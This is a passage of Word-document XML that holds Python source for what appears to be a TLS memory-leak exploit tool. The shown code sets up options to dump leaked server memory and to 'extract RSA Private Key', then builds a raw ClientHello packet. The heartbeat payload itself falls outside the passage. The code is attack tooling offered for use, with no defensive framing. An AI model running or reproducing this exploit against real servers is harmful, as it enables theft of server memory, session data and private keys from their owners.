      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="verbose", help='Enable verbose output')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA9B344" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1F4EDDD8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-x', '--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', action="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>store_true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", help='Enable hex output')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA16C67" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5EC88974" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-r', '--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rawoutfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', type='str', help='Dump the raw memory contents to a file')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4DFF68" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="214C1193" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-a', '--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>asciioutfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', type='str', help='Dump the ascii contents to a file')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4AF13E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1C15C43F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-d', '--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>donotdisplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', action="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>store_true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>donotdisplay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", help='Do not display returned data on screen')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A166DF2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="19849437" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.add_option</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('-e', '--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>extractkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>', action="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>store_true</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>extractkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", help='Attempt to extract RSA Private Key, will exit when found. Choosing this enables -d, do not display returned data on screen.')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E36B768" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6426D7D0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="413227E5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3C315428" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">opts, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>options.parse_args</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7665D0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="182CA9E4" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="047E54B1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7D83BB00" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>opts.extractkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A9F1C0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="2FAC2B3E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    import base64, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gmpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B03B0DA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="57A49866" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    from pyasn1.codec.der import encoder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60776EF9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="60E93234" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    from pyasn1.type.univ import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37D65F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1227E06B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1ED91D8C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0A4F51F0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>def hex2bin(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20072201" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4CB05495" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    return ''.join('{:02x}'.format(x) for x in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).decode('hex')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A9B844" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="410EBDE7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6D981F68" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7FF9C679" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls_versions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = {0x01:'TLSv1.0',0x02:'TLSv1.1',0x03:'TLSv1.2'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C400D2A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3045CBD1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="00A8D650" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6832762E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>build_client_hello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ECA89D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7C0D7589" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>client_hello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B62F531" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0E652C59" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># TLS header ( 5 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A631A1D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="26EDA4D3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x16,               # Content type (0x16 for handshake)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D907C6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="720BF797" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">0x03, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,         # TLS Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502652B1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="693F2D6F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0xdc,         # Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BEF30F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="337F6A54" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># Handshake header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1EF73A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="50FF3653" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">0x01,               # Type (0x01 for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ClientHello</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3E837" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="01806C90" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0x00, 0x00, 0xd8,   # Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D176FA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1CCE242C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve">0x03, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tls_ver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>,         # TLS Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4E78A3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7C76D815" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># Random (32 byte)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764C99C8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="73B48D1B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x53, 0x43, 0x5b, 0x90, 0x9d, 0x9b, 0x72, 0x0b,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709643F6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4FBA17A6" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0xbc, 0x0c, 0xbc, 0x2b, 0x92, 0xa8, 0x48, 0x97,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312A08B5" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="349CD395" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0xcf, 0xbd, 0x39, 0x04, 0xcc, 0x16, 0x0a, 0x85,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6DCE12" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="32878BAA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x03, 0x90, 0x9f, 0x77, 0x04, 0x33, 0xd4, 0xde,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1505CDCE" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1AB51189" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00,               # Session ID length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E6300" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="38D8D39D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x66,         # Cipher suites length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713AF4FD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7DD58EA2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t># Cipher suites (51 suites)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CDDF75" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="69022FB1" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0xc0, 0x14, 0xc0, 0x0a, 0xc0, 0x22, 0xc0, 0x21,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EC8F3E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="753FED40" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x39, 0x00, 0x38, 0x00, 0x88, 0x00, 0x87,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307DA524" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5F351757" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0xc0, 0x0f, 0xc0, 0x05, 0x00, 0x35, 0x00, 0x84,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CD4677" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="6814FF3F" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0xc0, 0x12, 0xc0, 0x08, 0xc0, 0x1c, 0xc0, 0x1b,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089100B0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="3DD40986" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x16, 0x00, 0x13, 0xc0, 0x0d, 0xc0, 0x03,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7E2C41" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="25747389" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x0a, 0xc0, 0x13, 0xc0, 0x09, 0xc0, 0x1f,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8111E7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1598C188" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0xc0, 0x1e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x9a,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20454691" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="1CB0D915" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x99, 0x00, 0x45, 0x00, 0x44, 0xc0, 0x0e,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4784BB24" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="4A0C3CFA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0xc0, 0x04, 0x00, 0x2f, 0x00, 0x96, 0x00, 0x41,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528C280C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="65E93D68" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0xc0, 0x11, 0xc0, 0x07, 0xc0, 0x0c, 0xc0, 0x02,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE5B1F2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="69E871B8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x05, 0x00, 0x04, 0x00, 0x15, 0x00, 0x12,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155F93C3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="0EB4533E" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x09, 0x00, 0x14, 0x00, 0x11, 0x00, 0x08,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA3C3A" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="53155A94" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x06, 0x00, 0x03, 0x00, 0xff,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7540D3FA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="53111375" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x01,               # Compression methods length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5124503C" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7926FABD" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00,               # Compression method (0x00 for NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676E28E8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="08243D0D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x49,         # Extensions length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7146DD5B" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="46A6F0C2" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve"># Extension: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ec_point_formats</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D6F1055" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="78D235C9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336666F7" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7A88F0D0" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t xml:space="preserve"># Extension: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elliptic_curves</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="728B48A8" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="646F40DA" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B17D3B9" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="7C222297" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4495F883" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="486B8498" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCA8E3D" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="78BF9DE3" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A190499" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537"/>
    <w:p w14:paraId="5CD25A97" w14:textId="77777777" w:rsidR="000E7537" w:rsidRDefault="000E7537" w:rsidP="000E7537">
      <w:r>
        <w:t>0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,</w:t>
      </w:r>
    </w:p>
